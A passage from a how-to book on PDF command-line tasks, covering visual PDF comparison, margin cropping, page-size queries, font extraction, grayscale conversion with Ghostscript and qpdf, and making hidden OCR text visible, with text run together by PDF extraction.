‘pixelization’ of the results (top two images). Zoom in to see this in more detail. The 720 ppi version
appearstocomeoutmuchmoresmoothly.However,forthisspecificcase72ppiwouldbe‘goodenough’
todiscoverthatinthetwoPDFstherewasuseda‘0’(numberzero)insteadofan‘O’(capitalletter‘o’)at
twodifferentspots.
Example 2
The following image shows two other PDF pages side by side. Hardly anybody will be able to spot the
differencesbetweenthese,butsomepeoplewill:
HowcanIcompare2PDFsonthecommandline? 17
TwoPDFpageswhichdodiffer–differencescanonlybebespottedbylooking veryclosely.
Nowusethefollowingcommandstocreateafewdifferentvisualizationofthe‘deltas’:
..1compare file3.pdf file4.pdf delta5.pdf
2compare file3.pdf file4.pdf -compose src delta6.pdf
3compare -density 720 file3.pdf file4.pdf delta7.pdf
4compare -density 720 file3.pdf file4.pdf -compose src delta8.pdf
Theresultingdifferencesareshowninthefollowingpicture.
Fourdifferentwaystovisualizethedifferencesbetweenthelasttwoinputfiles.Againa72ppiresolutionforthetoptwo
anda720ppiresolutionforthebottomones.The1standthe3rddoshowagrayscalecontextbackground,theothersdo
not.Pleasezoomintospotthefinerpixeldifferencesbetweenthedifferentresolutions...
Again, the 72 ppi-based comparison of the two input PDFs shows a clearly visible ‘pixelization’ of the
results(toptwoimages).The720ppiversiondoesshowthedifferencesmuchmoreclearly:itisjustthat
thetextisshiftedslightlytotheleftandtothetopinthecaseofthesecondinput.Ifyouzoominenough
into the 720 ppi versions, you can even count the number of pixels: the shift for each single character of
HowcanIcompare2PDFsonthecommandline? 18
the text is constistenlty 5 pixels to the right and 5 pixels to the top. The 72 ppi version cannot bring out
this subtle difference so clearly: at this resolution the shift is only 1/2 pixel to the right and 1/2 pixel to
the top. This means that for some characters there is no shift occuring at all, and other characters move
byafullpixelineitherdirection.Thisbecomesclearlyvisibleinthefactthatsomecharactersdonotlook
changedatallwhileothersclearlydo.
Example 3
ThefollowingimageshowstwootherPDFdocuments.Canyouspotthedifference?
TwoPDFdocumentswhichdodiffer.Trytospotthedifference!
Creatingvisualizationsinred/whitepixelswillgivethefollowingresults.
HowcanIcompare2PDFsonthecommandline? 19
Fourdifferentwaystovisualizethedifferencesbetweenthelasttwoinputfiles.Againa72ppiresolutionforthetoptwo
anda720ppiresolutionforthebottomones.The1standthe3rddoshowagrayscalecontextbackground,theothersdo
not...
If you have access to the original delta files and zoom in on no. 3 you can clearly see that the second
documentcontainsachangedprize:goingupby2.000$USbychangetheoriginal‘6’toan‘8’.
Update
For those of you who want to reproduce the commands shown above, you’d also need access to the
samesourcefilesIused.That’seasy:IusedGhostscripttocreatetheseexampleinputPDFs.Herearethe
HowcanIcompare2PDFsonthecommandline? 20
commandsforthis:
..1gs \
2 -o file1.pdf \
3 -sDEVICE=pdfwrite \
4 -g5950x1100 \
5 -c "/Courier findfont 72 scalefont setfont \
6 30 30 moveto (HELL0, WORLD\!) show \
7 showpage"
8
9gs \
10 -o file1.pdf \
11 -sDEVICE=pdfwrite \
12 -g5950x1100 \
13 -c "/Courier findfont 72 scalefont setfont \
14 30 30 moveto (HELLO, W0RLD\!) show \
15 showpage"
16
17 gs \
18 -o file1.pdf \
19 -sDEVICE=pdfwrite \
20 -g5950x1100 \
21 -c "/Courier findfont 72 scalefont setfont \
22 30 30 moveto (Hi, Universe\!) show \
23 showpage"
24
25 gs \
26 -o file1.pdf \
27 -sDEVICE=pdfwrite \
28 -g5950x1100 \
29 -c "/Courier findfont 72 scalefont setfont \
30 30.5 30.5 moveto (Hi, Universe\!) show \
31 show showpage"
6How can I remove white margins from
PDF pages?
..I would like to know a way to remove white margins from a PDF file. Just like Adobe Acrobat X Pro
does.IunderstanditwillnotworkwitheveryPDFfile.
Iwouldguessthatthewaytodoit,isbygettingthetextmargins,thencroppingoutofthatmargins.
PyPdfispreferred.
1iText finds text margins based on this code:
2
3
4 public void addMarginRectangle(String src, String dest)
5 throws IOException, DocumentException {
6 PdfReader reader = new PdfReader(src);
7 PdfReaderContentParser parser = new PdfReaderContentParser(reader);
8 PdfStamper stamper = new PdfStamper(reader, new FileOutputStream(RESULT));
9 TextMarginFinder finder;
10 for (int i = 1; i <= reader.getNumberOfPages(); i++) {
11 finder = parser.processContent(i, new TextMarginFinder());
12 PdfContentByte cb = stamper.getOverContent(i);
13 cb.rectangle(finder.getLlx(), finder.getLly(),
14 finder.getWidth(), finder.getHeight());
15 cb.stroke();
16 }
17 stamper.close();
18 }
6.1Answer
I’mnottoofamiliarwithPyPDF,butIknowGhostscriptwillbeabletodothisforyou.Herearelinksto
someotheranswersonsimilarquestions:
1.ConvertPDF2sidesperpageto1sideperpage 1(SuperUser.com)
2.Freewaretosplitapdf’spagesdownthemiddle? 2(SuperUser.com)
3.CroppingaPDFusingGhostscript9.01 3(StackOverflow.com)
The third answer is probably what made you say ‘ I understand it will not work with every PDF file ’. It
usesthe pdfmarkcommandtotryandsetthe /CropBox intothePDFpageobjects.
1http://superuser.com/a/189109/40894
2http://superuser.com/a/235401/40894
3http://stackoverflow.com/a/6184547/359307
21
HowcanIremovewhitemarginsfromPDFpages? 22
Themethodofthefirsttwoanswerswillmostlikelysucceedwherethethirdonefails.Thismethoduses
aPostScriptcommandsnippetof <</PageOffset [NNN MMM]>> setpagedevice toshiftandplacethePDF
pages on a (smaller) media size defined by the -gNNNNxMMMM parameter (which defines device width and
heightinpixels).
Ifyouunderstandtheconceptbehindthefirsttwoanswers,you’lleasilybeabletoadaptthemethodused
theretocropmarginsonall4edgesofaPDFpage:
AnexamplecommandtocropalettersizedPDF(8.5x11in==612x792pt)byhalfaninch(==36pt)oneach
ofthe4edges(commandisforWindows):
..1 gswin32c.exe ^
2 -o cropped.pdf ^
3 -sDEVICE=pdfwrite ^
4 -g5400x7200 ^
5 -c "<</PageOffset [-36 -36]>> setpagedevice" ^
6 -f input.pdf
Theresultingpagesizewillbe7.5x10in(==540x720pt).TodothesameonLinuxorMac,use:
..1 gs \
2 -o cropped.pdf \
3 -sDEVICE=pdfwrite \
4 -g5400x7200 \
5 -c "<</PageOffset [-36 -36]>> setpagedevice" \
6 -f input.pdf
Update:Howtodetermine‘margins’withGhostscript
Acommentaskedfor‘automatic’determinationofthewhitemargins.YoucanuseGhostscript’stoofor
this.Its bboxdevicecandeterminetheareacoveredbythe(virtual)inkoneachpage(andhence,indirectly
thewhitespaceforeachedgeofthecanvas).
Hereisthecommand:
..1 gs \
2 -q -dBATCH -dNOPAUSE \
3 -sDEVICE=bbox \
4 input.pdf
HowcanIremovewhitemarginsfromPDFpages? 23
Output(example):
..1 %%BoundingBox: 57 29 562 764
2 %%HiResBoundingBox: 57.265030 29.347046 560.245045 763.649977
3 %%BoundingBox: 57 28 562 667
4 %%HiResBoundingBox: 57.265030 28.347046 560.245045 666.295011
The bboxdevicerenderseachPDFpageinmemory(withoutwritinganyoutputtodisk)andthenprints
the BoundingBox and HiResBoundingBox info to stderr. You may modify this command like that to
maketheresultsmoreeasytoparse:
..1 gs \
2 -q -dBATCH -dNOPAUSE \
3 -sDEVICE=bbox \
4 input.pdf \
5 2>&1 \
6 | grep -v HiResBoundingBox
Output(example):
..1 %%BoundingBox: 57 29 562 764
2 %%BoundingBox: 57 28 561 667
Thiswouldtellyou...
•...that the lower left corner of the content rectangle of Page 1is at coordinates [57 29]with the
upperrightcornerisat [562 741]
•...that the lower left corner of the content rectangle of Page 2is at coordinates [57 28]with the
upperrightcornerisat [561 667]
Thismeans:
•Page1usesawhitespaceof57ptontheleftedge( 72pt == 1in == 25,4mm ).
•Page1usesawhitespaceof29ptonthebottomedge.
•Page2usesawhitespaceof57ptontheleftedge.
•Page2usesawhitespaceof28ptonthebottomedge.
HowcanIremovewhitemarginsfromPDFpages? 24
As you can see from this simple example already, the whitespace is not exactly the same for each page.
Depending on your needs (you likely want the same size for each page of a multi-page PDF, no?), you
havetoworkoutwhataretheminimummarginsforeachedgeacrossallpagesofthedocument.
Nowwhatabouttherightandtopedgewhitespace?Tocalculatethat,youneedtoknowtheoriginalpage
sizeforeachpage.Themostsimplewaytodeterminethis:the pdfinfoutility.Examplecommandfora5
pagePDF:
..1 pdfinfo \
2 -f 1 \
3 -l 5 \
4 input.pdf \
5 | grep "Page "
Output(example):
..1 Page 1 size: 612 x 792 pts (letter)
2 Page 2 size: 612 x 792 pts (letter)
3 Page 3 size: 595 x 842 pts (A4)
4 Page 4 size: 842 x 1191 pts (A3)
5 Page 5 size: 612 x 792 pts (letter)
Thiswillhelpyoudeterminetherequiredcanvassizeandtherequired(maximum)whitemarginsofthe
topandrightedgesofeachofyournewPDFpages.
Thesecalculationscanallbescriptedtoo,ofcourse.
But if your PDFs are all of a uniq page size, or if they are 1-page documents, it all is much easier to get
done...
7Using Ghostscript to get page size
..Isitpossibletogetthepagesize(frome.g.aPDFdocumentpage)usingGhostscript?
I have seen the bboxdevice, but it returns the bounding box (it differs per page), not the TrimBox (or
CropBox)ofthePDFpages.(See Prepressurewebsite forinfoaboutpageboxes.)Anyotherpossibility?
http://www.prepressure.com/pdf/basics/page_boxes
7.1Answer 1
Unfortunatelyitdoesn’tseemquiteeasytogetthe(possiblydifferent)pagesizes(or*Boxesforthatmatter)
insideaPDFwiththehelpofGhostscript.
But since you asked for other possibilities as well: a rather reliable way to determine the media sizes for
each page (and even each one of the embedded {Trim,Media,Crop,Bleed}Boxes) is the commandline tool
pdfinfo.exe. This utility is part of the XPDF tools from http://www.foolabs.com/xpdf/download.html 1.
Youcanrunthetoolwiththe -boxparameterandtellitwith -f 3tostartatpage3andwith -l 8tostop
processingatpage8.
Example output
..1 C:\downloads>pdfinfo -box -f 1 -l 3 _IXUS_850IS_ADVCUG_EN.pdf
2 Creator: FrameMaker 6.0
3 Producer: Acrobat Distiller 5.0.5 (Windows)
4 CreationDate: 08/17/06 16:43:06
5 ModDate: 08/22/06 12:20:24
6 Tagged: no
7 Pages: 146
8 Encrypted: no
9 Page 1 size: 419.535 x 297.644 pts
10 Page 2 size: 297.646 x 419.524 pts
11 Page 3 size: 297.646 x 419.524 pts
12 Page 1 MediaBox: 0.00 0.00 595.00 842.00
13 Page 1 CropBox: 87.25 430.36 506.79 728.00
14 Page 1 BleedBox: 87.25 430.36 506.79 728.00
15 Page 1 TrimBox: 87.25 430.36 506.79 728.00
16 Page 1 ArtBox: 87.25 430.36 506.79 728.00
17 Page 2 MediaBox: 0.00 0.00 595.00 842.00
18 Page 2 CropBox: 148.17 210.76 445.81 630.28
19 Page 2 BleedBox: 148.17 210.76 445.81 630.28
20 Page 2 TrimBox: 148.17 210.76 445.81 630.28
1http://www.foolabs.com/xpdf/download.html
25
UsingGhostscripttogetpagesize 26
..21 Page 2 ArtBox: 148.17 210.76 445.81 630.28
22 Page 3 MediaBox: 0.00 0.00 595.00 842.00
23 Page 3 CropBox: 148.17 210.76 445.81 630.28
24 Page 3 BleedBox: 148.17 210.76 445.81 630.28
25 Page 3 TrimBox: 148.17 210.76 445.81 630.28
26 Page 3 ArtBox: 148.17 210.76 445.81 630.28
27 File size: 6888764 bytes
28 Optimized: yes
29 PDF version: 1.4
7.2Answer 2
MeanwhileIfoundadifferentmethod.ThisoneusesGhostscriptonly(justasyourequired).Noneedfor
additionalthirdpartyutilities.
This method uses a little helper program, written in PostScript, shipping with the source code of
Ghostscript.Lookinthe toolbinsubdirforthe pdf_info.ps file.
Theincludedcommentssayyoushouldrunitlikethisinordertolistfontsused,mediasizesused
..1 gswin32c -dNODISPLAY ^
2 -q ^
3 -sFile=____.pdf ^
4 [-dDumpMediaSizes] ^
5 [-dDumpFontsUsed [-dShowEmbeddedFonts]] ^
6 toolbin/pdf_info.ps
I did run it on a local example file, with commandline parameters that ask for the media sizes only (not
thefontsused).Hereistheresult:
..1 C:\> gswin32c ^
2 -dNODISPLAY ^
3 -q ^
4 -sFile=c:\downloads\_IXUS_850IS_ADVCUG_EN.pdf ^
5 -dDumpMediaSizes ^
6 C:/gs8.71/lib/pdf_info.ps
7
8
9 c:\downloads\_IXUS_850IS_ADVCUG_EN.pdf has 146 pages.
10 Creator: FrameMaker 6.0
11 Producer: Acrobat Distiller 5.0.5 (Windows)
12 CreationDate: D:20060817164306Z
13 ModDate: D:20060822122024+02'00'
UsingGhostscripttogetpagesize 27
..14
15 Page 1 MediaBox: [ 595 842 ] CropBox: [ 419.535 297.644 ]
16 Page 2 MediaBox: [ 595 842 ] CropBox: [ 297.646 419.524 ]
17 Page 3 MediaBox: [ 595 842 ] CropBox: [ 297.646 419.524 ]
18 Page 4 MediaBox: [ 595 842 ] CropBox: [ 297.646 419.524 ]
19 [....]
IIFonts
8How can I extract embedded fonts from a
PDF as valid font files?
..I’m aware of the pdftk.exe utility that can indicate which fonts are used by a PDF, and whether they
areembeddedornot.
Nowtheproblem:givenIhadPDFfileswithembeddedfonts–howcanIextractthosefontsinaway
that they are re-usable as regular font files? Are there (preferably free) tools which can do that? Also:
canthisbedoneprogrammaticallywith,say,iText?
Youhaveseveraloptions.AllthesemethodsworkonLinuxaswellasonWindowsorMacOSX.However,
beawarethatmostPDFsdonotincludetofull,completefontfacewhentheyhaveafontembedded.Mostly
theyincludejustthe subsetofglyphsusedinthedocument.
8.1Method 1: Using pdftops
Oneofthemostfrequentlyusedmethodstodothison*nixsystemsconsistsofthefollowingsteps:
1.ConvertthePDFtoPostScript,forexamplebyusingXPDF’s pdftops1(onWindows: pdftops.exe
helperprogram.
2.Nowfontswillbeembeddedin .pfa(PostScript)format+youcanextractthemusinga texteditor .
3.Youmayneedtoconvertthe .pfa(ASCII)toa .pfb(binary)fileusingthe t1utilsandpfa2pfb.
4.InPDFstherearenever .pfmor.afmfiles(fontmetricfiles)embedded(becausePDFviewerhave
internal knowledge about these). Without these, font files are hardly usable in a visually pleasing
way.
8.2Method 2: Using fontforge
AnothermethodistousetheFreefonteditor FontForge 2:
1.Usethe “Open Font” dialogboxusedwhenopeningfiles.
2.Thenselect “Extract from PDF” inthefiltersectionofdialog.
3.SelectthePDFfilewiththefonttobeextracted.
1http://www.foolabs.com/xpdf/download.html
2http://fontforge.sourceforge.net/
29
HowcanIextractembeddedfontsfromaPDFasvalidfontfiles? 30
4.A“Pick a font” dialogboxopens–selectherewhichfonttoopen.
Check the FontForge manual. You may need to follow a few specific steps which are not necessarily
straightforwardinordertosavetheextractedfontdataasafilewhichisre-usable.
8.3Method 3: Using mupdf
Next,MuPDF3. This application comes with a utility called pdfextract (on Windows: pdfextract.exe )
which can extract fonts and images from PDFs. (In case you don’t know about MuPDF, which still is
relativelyunknownandnew: “MuPDF is a Free lightweight PDF viewer and toolkit written in portable C.” ,
writtenbyArtifexSoftwaredevelopers,thesamecompanythatgaveusGhostscript.)
Note:pdfextract.exeisacommand-lineprogram.Touseit,dothefollowing:
..1 c:\> pdfextract.exe c:\path\to\filename.pdf # (on Windows)
2 $> pdfextract /path/tofilename.pdf # (on Linux, Unix, Mac OS X)
Thiscommandwilldumpalloftheextractablefilesfromthepdffilereferencedintothecurrentdirectory.
Generallyyouwillseeavarietyoffiles:imagesaswellasfonts.TheseincludePNG,TTF,CFF,CID,etc.
Theimagenameswillbelike img-0412.png ifthePDFobjectnumberoftheimagewas412.Thefontnames
willbelike FGETYK+LinLibertineI-0966.ttf ,ifthefont’sPDFobjectnumberwas966.
CFF ( Compact Font Format ) files are a recognized format that can be converted to other formats via a
varietyofconvertersforuseondifferentoperatingsystems.
Again:beawarethatmostofthesefontfilesmayhaveonlya subsetofcharactersandmaynotrepresent
thecompletetypeface.
Update:(Jul 2013) Recent versions of mupdfhave seen an internal reshuffling and renaming of their
binaries, not just once, but several times. The main utility used to be a ‘swiss knife’-alike binary called
mubusy(name inspired by busybox?), which more recently was renamed to mutool. These support the
sub-commands info,clean,extract,posterandshow.Unfortunatey,theofficialdocumentationforthese
toolsisn’tuptodate(yet).Ifyou’reonaMacusing‘MacPorts’:thentheutilitywasrenamedinorderto
avoidnameclasheswithotherutilitiesusingidenticalnames,andyoumayneedtouse mupdfextract .
To achieve the (roughly) equivalent results with mutoolas its previous tool pdfextract did, just run
mubusy extract ... .*
Sotoextractfontsandimages,youmayneedtorunoneofthefollowingcommandlines.
OnWindows:
3http://mupdf.com/
HowcanIextractembeddedfontsfromaPDFasvalidfontfiles? 31
..1 c:\> mutool.exe extract filename.pdf
OnLinux,Unix,MacOSX:
..1 $> mutool extract filename.pdf
8.4Method 4: Using gs(Ghostscript)
Finally,Ghostscript 4can also extract fonts directly from PDFs. However, it needs the help of a special
utility program named extractFonts.ps 5, written in PostScript language, which is available from the
Ghostscriptsourcecoderepository 6.
Now use it, you need to run both, this file extractFonts.ps and your PDF file. Ghostscript will then
use the instructions from the PostScript program to extract the fonts from the PDF. It looks like this on
Windows(yes,Ghostscriptunderstandsthe‘forwardslash’,/,asapathseparatoralsoonWindows!):
..1 gswin32c.exe ^
2 -q -dNODISPLAY ^
3 c:/path/to/extractFonts.ps ^
4 -c "(c:/path/to/your/PDFFile.pdf) extractFonts quit"
oronLinux,UnixorMacOSX:
..1 gs \
2 -q -dNODISPLAY \
3 /path/to/extractFonts.ps \
4 -c "(/path/to/your/PDFFile.pdf) extractFonts quit"
I’ve tested the Ghostscript method a few years ago. At the time it did extract *.ttf (TrueType) just fine. I
don’t know if other font types will also be extracted at all, and if so, in a re-usable way. I don’t know if
theutilitydoesblockextractingoffontswhicharemarkedasprotected.
4http://www.ghostscript.com/releases/
5http://git.ghostscript.com/?p=ghostpdl.git;a=blob_plain;f=gs/toolbin/extractFonts.ps
6http://git.ghostscript.com/?p=ghostpdl.git;a=tree;f=gs
HowcanIextractembeddedfontsfromaPDFasvalidfontfiles? 32
8.5 Caveats:
•In any case you need to follow the license that applies to the font. Some font licences do
not allow free use and/or distribution. Pirating fonts is like pirating any software or other
copyrighted material.
•Most PDFs which are in the wild out there do not embed the full font anyway, but only
subsets. Extracting a subset of a font is only useful in a very limited scope, if at all.
PleasedoalsoreadthefollowingaboutProsand(more)Consregardingfontextractionefforts:
•http://typophile.com/node/34377
9How can I get Ghostscript to use
embedded fonts in PDF?
..HereisthecommandIuse:
1gs \
2 -o output.pdf \
3 -dCompatibilityLevel=1.4 \
4 -dPDFSETTINGS=/screen \
5 -sDEVICE=pdfwrite \
6 -sOutputFile=output.pdf \
7 input.pdf
I am using (trying anyway) to use Ghostscript to reduce my PDF file size. The command above
lookslikeitworks,itreducesfilesizegreatly,butthenseveralofthefieldsaregarbled.Asforas
Icantrackitdown,it’sdoingfontsubstitution.IE,thesametext=samegarbledtext.
The fonts are embedded in the PDF when it gets to me. Additionally, I have tried to add all the
fontstotheFontmap.
Anyideas,IdeallyIwouldlikeittousetheembeddedfontswithoutmehavingtoupdatethegs
systemfonts/editfontmap,etc.I’musingUbuntu9.10andtheFontsembeddedarewindowsfonts,
Arial/TimesNewRoman.
9.1Answer
EmbeddingfontsretrospectivlywhichwerenotembeddedintheoriginalPDFdoesincreasethefilesize,
notdecreaseit.
However,theremaystillbeachancetoreducetheoverallfilesizebyreducingtheresolutionofembedded
images...dependsonyourpreferencesandneeds.
You can try with variations of the following commandline. It will embed all fonts (even the “Base 14”
ones),butembedrequiredglyphsonly(a“subset”oftheoriginalfont),andalsocompressthefonts:
..1gs \
2 -o output.pdf \
3 -dCompatibilityLevel=1.4 \
4 -dPDFSETTINGS=/screen \
5 -dCompressFonts=true \
6 -dSubsetFonts=true \
7 -sDEVICE=pdfwrite \
33
HowcanIgetGhostscripttouseembeddedfontsinPDF? 34
..8 -c ".setpdfwrite <</NeverEmbed [ ]>> setdistillerparams" \
9 -f input.pdf
YouwillhavenoticedthatIdidusethe -o output.pdf conventioninsteadof -sOutputFile=output.pdf .
Ialsodidn’tinclude -dBATCH -dNOPAUSE inmycommand.Thereasonisthatbothmethodsareequivalent,
since -o ...silentlyalsosets -dBATCH -dNOPAUSE :
‘Traditional’Ghostscriptoption:
..1 -sOutputfile=output.pdf -dBATCH -dNOPAUSE
‘Modern’Ghostscriptoptions
..1 -o output.pdf
However,themodernshortcutwayofwritingthecommanddoesnotworkforolderGhostscriptversions.
If you look into reducing the file size of PDFs only and have now particularly compelling reason to set
-dPDFSETTINGS=/screen , then the chapter “How can I convert a color PDF into grayscale?” may also be
somethingtoconsider.
IIIScanned Pages and PDF
10How can I make the invisible OCR
information on a scanned PDF page
visible?
..IhaveaPDFwhichistheresultofscannedpages.Itcontainslotsofnumbers.
In our organization’s workflow, we usually scan incoming mail delivered by the postal service,
archivethemandthenscraptheoriginalpapers.
Having read some recent news about PDFs resulting from scans made with a certain brand of
scannersmanglingnumbersbadly,IwanttocheckifthiscanhappenwithOCRtoo.
MyknowledgeaboutOCRofscannedpagesisratherlimited.Myonlyinfoaboutitisthatituses
somehiddenlayertostorethetext.HowcanIun-hidethishiddenlayer?
10.1 Answer
No, OCR information about scanned pages is not stored in a hidden layer. Layers in a PDF are quite a
differentconcept.
But OCR-ed text nevertheless is ‘hidden’ – but hidden alongside the same layer as the rest of the page
content.
Isuggestyoureadthechapterofthisbooknamed “HowcanIuseinvisiblefontsinaPDF?” first.Itgives
youashorttheoreticalbackgroundof“invisibletext”regardingPDF.
The OCR text in your PDF uses Text Rendering Mode 3 (‘Neither fill nor stroke glyph shapes’). In order
tomakethistextvisible,youhavetochangethistextrenderingmodetooneoftheothermodes:
•0 Tr(filltext)
•1 Tr(stroketext)
•2 Tr(fill,thenstroketext)
•4 Tr(filltextandaddtopathforclipping)
•5 Tr(stroketextandaddtopathforclipping)
My favorite mode for this job would be 1 Tr. It will just draw the outline shape of the glyphs without
fillingthem.Irecommendtodothisusingaverythinredline.Thiswayyouwillbeabletoseetheexact
positioningofthetextrelativetothescannedimagewhenyouzoomintothepage.
UnfortunatelyIdonotknowofanycommandlinetoolthatcanachievethis.You’llhavetodiveintothe
PDFsourcecodeandmanipulateitwithatexteditor.
Fortunatelythisismuchmoreeasythanitsoundsatfirst.Wewillusethreestepsforthis:
1.ExpandtheoriginalPDFsourcecodeoftheOCR/scannedPDFusing qpdf1.
1http://qpdf.sf.net/
36
HowcanImaketheinvisibleOCRinformationonascannedPDFpagevisible? 37
2.OpentheexpandedPDFsourcecodeinasimpletexteditorandmanipulateit.
3.‘Repair’ the PDF source code (which has become ‘corrupted’ through our editing) and copress it
again.
Step 1: Expand the original PDF
LookingatthescannedPDFpagemayshowaviewliketheoneinthefollowingimage.
Screenshotshowingtheoriginalscanned/OCR-edPDFpageopenedinAcrobat.
If you’ve read other chapters of this book already, you may be familiar with qpdf. It can expand PDF
source code and transform it into a mode that makes it more easy to process for human brains (if these
brainshaveacquiredsomePDFknowhowbeforehand,oriftheyareguidedwiththehelpofabooklike
thisone).Hereisthecommandtouse:
..1 qpdf --qdf --object-streams=disable original-scan.pdf qdf---original-scan.pdf
ThiscreatedanewPDFfilenamed qdf---original-scan.pdf whichcaneasilybeopenedandmanipu-
latedbyatexteditor.
Note,incaseyouroriginalPDFhadbinarydatasections(suchasimages,fontsorcolorprofiles),
thesewillnotbeexpandedandwillstillbecontainedinbinaryforminyourexpandedPDF.It
is only the other components which were expanded. So your text editor should be able to not
getahangoverfromthesebinarypartsandsaveyoureditedversionwithoutdamagingthese.
HowcanImaketheinvisibleOCRinformationonascannedPDFpagevisible? 38
Step 2: Open the expanded PDF with a text editor
NowopenthenewPDFfileinyourfavoritetexteditor.Searchforallspotswhereyoufindthetextstring
3 Tr.Itcouldlooklikethis:
..1[....]
2/F16 7.500 Tf
33 Tr
41.180 Tc
5[....]
Modify these text strings and replace them by the following: 1 0 0 RG 0.1 w 1 Tr . The resulting PDF
codecouldthenlooklikethis:
..1[....]
2/F16 7.500 Tf
31 0 0 RG 0.1 w 1 Tr
41.180 Tc
5[....]
Thismodificationwillhavethefollowingeffects:
•1 Tr:thisswitchesthetextrenderingmodeto ‘Stroke text’ .
•0.1 w:thissetsthestrokinglineforthetextrenderingmodetoaverythinone, 0.1 points only.
•RG:thissetstheRGBcolormodeforstrokingoperations.
•1 0 0 RG :thissetsthecolorto‘red’forRGBcolors.
NowsavethismodifiedPDFunderanewnamelike qdf---edited-scan.pdf .
Step 3: ‘Repair’ the modified PDF and compress it again
Our editing manipulations will very likely have ‘corrupted’ the PDF. Because we inserted some 15
additional characters (*1 0 0 RG 0.1 w *), the PDF’s cross reference table (which holds a list of all object
addresses based as byte offsets from the files start) will no longer be correct. You can use qpdfto check
forthisproblem:
..1 qpdf --check qdf---edited-scan.pdf
Theoutputwillbesimilartothis:
HowcanImaketheinvisibleOCRinformationonascannedPDFpagevisible? 39
..1 WARNING: qdf---edited-scan.pdf: file is damaged
2 WARNING: qdf---edited-scan.pdf (file position 717011): xref not found
3 WARNING: qdf---edited-scan.pdf: Attempting to reconstruct cross-reference table
4 checking qdf---edited-scan.pdf
5 PDF Version: 1.3
6 File is not encrypted
7 File is not linearized
Fortunately,manyPDFviewerswillnothavemajorproblemswiththis–they’llautomatically(andoften
silently) calculate a new xrefsection for the PDF and use that instead of the one embedded in the file.
YoucantrytoopenthefileasiswithyourPDFviewerandseeifitdoesordoesnotcauseaproblem.
But to play it save and make sure that each and every viewer will open the manipulated PDF without
choking,wewilluse qpdfagaininordertofixthisproblem:
..1 qpdf qdf---edited-scan.pdf ocr-made-visible-in-scan.pdf
Ifyoulookattheresultingfile, ocr-made-visible-in-scan.pdf ,youshouldseesomethinglikethisnow:
Screenshotshowingthemanipulatedscanned/OCR-edPDFpageopenedinAcrobat.ThehiddenOCRtextisnowmade
visibleasthinredoutlines.Zoomingintotheimagewillrevealmoredetails.
HowcanImaketheinvisibleOCRinformationonascannedPDFpagevisible? 40
Zoomingintothemanipulatedscanned/OCR-edPDFpageat800%inAcrobat.
Nice,isn’tit?You’vejustearnedyour yellow belt inPDF-KungFoomastership. ;-)
IVColors
11How can I convert a color PDF into
grayscale?
..IhaveabunchofPDFdocumentswithlotsofcolorimagesinside.Iwanttogetthemprintedand
wanttomakesurethatnocolorisused.SoIthoughtconvertingthemtoall-grayscalePDFswould
beagoodidea.AlsoIwanttoofferthesedocumentsfordownload–soconversiontograyscale
seemstobeawaytoreducethefilesize.Isthiscorrect?
HowcanIachievethiswithGhostscript?
11.1 Answer
Yes,itiscorrectthatgrayscaleinsteadofcolorimagesinsidePDFsingeneraldoreducethefilesize.Iwill
showthiswithasmallexample.
Acommandtodothatisthefollowing:
..1gs \
2 -o gray.pdf \
3 -sDEVICE=pdfwrite \
4 -sColorConversionStrategy=Gray \
5 -sProcessColorModel=DeviceGray \
6 color.pdf
As long as the image’s resolution remains unchanged, a color-to-gray conversion should significantly
reducethesize:
•RGBimagesuse3colorchannels(red,green,blue)
•CMYKimagesuse4colorchannels(cyan,magenta,yellow)
•Grayimagesuseonlyonecolorchannel
Assumingthesamelevelof color depth foreachimagetype,thismeansthatratiosfortherawamountof
uncompressedimagedatawithequally-dimensionedimages 1:3:4forgray:rgb:cmyk images.
Ofcourse,inthereallifeimagesarecompressed.Dependingontheiractualcontents,differentcompres-
sionalgorithmswillchangethisratios–butforafirstapproximationtheyareanimportantconsideration
tomake.
42
HowcanIconvertacolorPDFintograyscale? 43
Thepicturebelow 1showstheoriginalinputfile, color.pdf,vs.theresultinggrayscaleoutput, gray.pdf.
Left:original color PDF – Right:grayscale PDF converted with Ghostcript. (Color image used in the PDF is by Craig
ONeal(“minds-eye”),licensedunderCreativeCommons‘BY-SA2.0’.)
Comparingthefilesizesofthesetwofilesshowsthis:
•color.pdf :2,6MByte
•gray.pdf :172kBbyte
Sointhisspecificcasetheconversionreducedthefilesizetoroughly6%oftheoriginal.
Note,not every single color-to-gray conversion will show the same amount of file size
reduction.** **The reduction ratio very much depends on the amount of color images used
intheoriginalPDFvs.theamountoftextorotherelements.
Tofurtheranalysewhathashappenedtotheimageduringconversion,wecanuse pdfimages andpdfinfo
likethis:
..1pdfimages -list color.pdf
2 page num type width height color comp bpc enc interp object ID
3 ---------------------------------------------------------------------
4 1 0 image 1280 825 rgb 3 8 image no 4 0
5
6
7pdfimages -list gray.pdf
8 page num type width height color comp bpc enc interp object ID
9 ---------------------------------------------------------------------
10 1 0 image 1280 825 gray 1 8 jpeg no 10 0
11
12
1Fordetailsabouttheoriginalcolorimageseechapter “Acknowlegements”
HowcanIconvertacolorPDFintograyscale? 44
..13 pdfinfo color.pdf | grep "Page size:"
14 Page size: 595 x 510 pts
TheimageinthePDFusestheRGBcolorspace.Sincethewidthofthepageis595PostScriptpoints(where
72 pt == 1 inch), and the width of the image (borderless on the page) is 1280 pixels, the resolution of the
imageasembeddedinthePDFpagecaneasilybecalculated.Inthecurrentcasethatresolutionforboth,
color.pdfand gray.pdfis152ppi( pixels per inch ).
Assuming the original color image had been of a higher resolution. With 300 ppi (4 times the number
of pixels than at 150 ppi) the PDF size could easily have exceeded 10 MByte. With 600 ppi (16 times the
numberofpixelsthanat150ppi)itcouldhaveexceeded40MByte.
Converting these high-resolution color images to grayscale would also significantly reduce the file size.
But when doing this conversion, you could at the same time downsample all high resolution images to,
say,150ppi.Hereishowyou’dachievethis:
..1gs \
2 -o 150ppi-gray.pdf \
3 -sDEVICE=pdfwrite \
4 -sColorConversionStrategy=Gray \
5 -sProcessColorModel=DeviceGray \
6 -dDownsampleMonoImages=true \
7 -dMonoImageResolution=150 \
8 -dMonoImageDownsampleType=/Bicubic \
9 -dMonoImageFilter=/CCITTFaxEncode \
10 -dMonoImageDownsampleThreshold=1.0 \
11 -dDownsampleGrayImages=true \
12 -dGrayImageResolution=150 \
13 -dGrayImageDownsampleType=/Bicubic \
14 -dGrayImageFilter=/DCTEncode \
15 -dGrayImageDownsampleThreshold=1.0 \
16 -dDownsampleColorImages=true \
17 -dColorImageResolution=150 \
18 -dColorImageDownsampleType=/Bicubic \
19 -dColorImageFilter=/DCTEncode \
